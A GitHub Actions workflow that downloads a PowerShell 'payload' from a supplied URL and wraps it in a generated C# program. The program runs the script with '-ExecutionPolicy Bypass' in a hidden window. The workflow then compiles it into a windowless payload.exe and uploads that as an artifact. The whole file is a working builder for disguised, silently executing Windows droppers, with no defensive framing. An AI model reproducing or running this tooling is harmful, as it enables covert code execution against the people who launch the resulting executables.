name: Convert PowerShell to EXE using C#

on:
  workflow_dispatch:
    inputs:
      payload_url:
        description: 'URL to fetch PowerShell script'
        required: true
        type: string

jobs:
  build:
    runs-on: windows-latest

    steps:
    # Step 1: Checkout repository
    - name: Checkout code
      uses: actions/checkout@v3

    # Step 2: Fetch the PowerShell script
    - name: Fetch PowerShell Payload
      shell: powershell
      run: |
        Invoke-WebRequest -Uri '${{ github.event.inputs.payload_url }}' -OutFile 'payload.ps1'
        if (!(Test-Path "payload.ps1")) { Write-Host "Payload script missing!"; exit 1 }

    # Step 3: Convert PowerShell script to a C# string (keeping it unchanged)
    - name: Prepare C# source file
      shell: powershell
      run: |
        $psCode = Get-Content -Raw -Path "payload.ps1"
        $escapedPsCode = $psCode -replace '"', '""'  # Only escape double quotes
        $csharpCode = @"
        using System;
        using System.Diagnostics;
        using System.IO;

        class Program {
            static void Main() {
                string psScript = @"
        $escapedPsCode
        ";
                string tempFile = Path.Combine(Path.GetTempPath(), "script.ps1");
                File.WriteAllText(tempFile, psScript);
                Process.Start(new ProcessStartInfo {
                    FileName = "powershell.exe",
                    Arguments = "-ExecutionPolicy Bypass -File `" + tempFile + "`"",
                    WindowStyle = ProcessWindowStyle.Hidden
                });
            }
        }
        "@
        Set-Content -Path "Program.cs" -Value $csharpCode

    # Step 4: Compile C# into EXE
    - name: Compile C# to EXE
      shell: cmd
      run: |
        "%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe" /target:winexe /out:payload.exe Program.cs
        if NOT EXIST payload.exe ( echo "Compilation failed!" & exit 1 )

    # Step 5: Upload the generated EXE
    - name: Upload Executable
      uses: actions/upload-artifact@v4
      with:
        name: payload_exe
        path: payload.exe


